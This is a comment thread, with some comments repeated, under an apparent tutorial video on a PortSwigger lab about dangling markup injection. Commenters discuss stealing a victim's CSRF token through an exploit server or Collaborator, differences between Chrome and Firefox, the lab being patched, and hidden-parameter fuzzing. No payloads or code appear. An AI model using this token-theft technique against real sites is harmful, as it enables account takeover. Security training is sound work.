I don't understand why only 480 people has watched this masterpiece explanation 🎉🎉🎉🎉 Loved it sir. You explained my most favourite bug type so efficiently.
I was disappointed when I did not find your explanation in portswigger lab and was ready to skip it at all because I did not understand a thing, but fortunately I tried to search a bit and was thrilled to see your amazing videos 🥰😍 Thank you very much for your kindness and amazing explanation👍
This lab cannot be solved in this way anymore, they patched using the URL of the lab as a replacement of Burp, very sad. Thanks for the video anyway, I learned a lot :)
Yes i am able to grab CSRF token of my own (wiener) from the exploit server's access logs but i can't see the CSRF token of the victim when i do deliver exploit to the victim. Lab is not doing the simulation thing any more
@@hichamzouhri395 Yep, I did a one-click version with js that works great on my own user, but near as I can tell the robot user never clicks on the "Click". I suspect that anything that isn't a official Collaborator URL is getting blocked once the user has the initial page. OK, fine, they're a business.
there's another lab related to CSP has been added in portswiger please solve that lab too the time of your recoding that lab didn't been added but now it's added please solve it
Please sir can you check if this exploit is still working on chrome latest version?? because it doesn't seem to work on chrome but the same exploit works on me on firefox
It's a good question. I don't see a reason why we are supposed to know that. My guess is that portswigger is encouraging trying out some logical GET parameters even if a site doesn't appear to be using them.
the URL has the id parameter, so that's a clue it might take others too; it's a hard problem to strike a balance between "expert" level labs vs. focusing on the core issue without weighing down the exercise with material covered in previous labs
I want to discuss the issue of hidden parameters, which is often mentioned in many fuzz bounty articles. However, I have not encountered this in practice, except in target practice. A normal website usually has hundreds of API interfaces and parameters. Even if we collect all the parameters and conduct fuzz testing on all interfaces, it would still be a significant workload. I'm not sure how much time others spend on exploring a single website when they are bounty hunting, but my patience only allows me to spend 2 to 3 hours on a website. This includes directory exploration, understanding the site's logic and functionality, as well as fuzzing and port scanning. @@mikeyfinn2
By doing it your way without burp collaburator while clicking the "click me" link after exploit server it says "invalid host" And when I try to do by the solution after delivering the exploit via exploit server and collaburator then I didnt get any DNS or HTTP interactions in the collaburator menu. Does anybody know any solutions :) Please ignore my language mistakes
The exploit is not working on chrome anymore that is weird because the victim is using chrome , I tried on firefox and the exploit works on me , but on the victim it is not working
I don't understand why only 480 people has watched this masterpiece explanation 🎉🎉🎉🎉
Loved it sir.
You explained my most favourite bug type so efficiently.
I was disappointed when I did not find your explanation in portswigger lab and was ready to skip it at all because I did not understand a thing, but fortunately I tried to search a bit and was thrilled to see your amazing videos 🥰😍
Thank you very much for your kindness and amazing explanation👍
Whoaa! the explanation was amazing, thanks you for share your knowledge bro.
Very good job. Definitely worth watching.
Great explanation brother. Helpful for a beginner to understand easily.
This lab cannot be solved in this way anymore, they patched using the URL of the lab as a replacement of Burp, very sad. Thanks for the video anyway, I learned a lot :)
It can be solved try to escape
@@jesusgavancho9170 How?
@@jesusgavancho9170 it appears the robot user won't click on the bait if the href URL targets the exploit server; did you get around that?
Thanks, I was losing my mind until I found this comment lol
Thank you for your explanation!!!
stealing CSRF token didn't work? Something were changed in this lab
Yes i am able to grab CSRF token of my own (wiener) from the exploit server's access logs but i can't see the CSRF token of the victim when i do deliver exploit to the victim. Lab is not doing the simulation thing any more
Vicitm is using Google Chrome so dangling markup injection won't work, in Firefox works. I did in another way escaping @@nishantdalvi9470
@@nishantdalvi9470 same issue here
I have the same problem 😢
@@hichamzouhri395 Yep, I did a one-click version with js that works great on my own user, but near as I can tell the robot user never clicks on the "Click". I suspect that anything that isn't a official Collaborator URL is getting blocked once the user has the initial page. OK, fine, they're a business.
como siempre tus videos son una joya
thank you sir
Thank you so much ❤
there's another lab related to CSP has been added in portswiger please solve that lab too
the time of your recoding that lab didn't been added but now it's added please solve it
Please sir can you check if this exploit is still working on chrome latest version?? because it doesn't seem to work on chrome but the same exploit works on me on firefox
same here
I like your video
8:20 it can be use for open redirect vul..?
Why do you know GET has the hidden parameter email?
It's a good question. I don't see a reason why we are supposed to know that.
My guess is that portswigger is encouraging trying out some logical GET parameters even if a site doesn't appear to be using them.
the URL has the id parameter, so that's a clue it might take others too; it's a hard problem to strike a balance between "expert" level labs vs. focusing on the core issue without weighing down the exercise with material covered in previous labs
I want to discuss the issue of hidden parameters, which is often mentioned in many fuzz bounty articles. However, I have not encountered this in practice, except in target practice. A normal website usually has hundreds of API interfaces and parameters. Even if we collect all the parameters and conduct fuzz testing on all interfaces, it would still be a significant workload. I'm not sure how much time others spend on exploring a single website when they are bounty hunting, but my patience only allows me to spend 2 to 3 hours on a website. This includes directory exploration, understanding the site's logic and functionality, as well as fuzzing and port scanning. @@mikeyfinn2
In general, any form input elements with name should be tested as url parameters.
By doing it your way without burp collaburator while clicking the "click me" link after exploit server it says "invalid host"
And when I try to do by the solution after delivering the exploit via exploit server and collaburator then I didnt get any DNS or HTTP interactions in the collaburator menu.
Does anybody know any solutions :)
Please ignore my language mistakes
The exploit is not working on chrome anymore that is weird because the victim is using chrome , I tried on firefox and the exploit works on me , but on the victim it is not working
@@youssef-kz3yn very kind of you to considering my comment ❤️
@@amaljose6374 you are welcome my friend if you find any solution please bring me back here
Has anybody been able to solve this lab recently?
bro, idk but i think you exposed your public ip on the video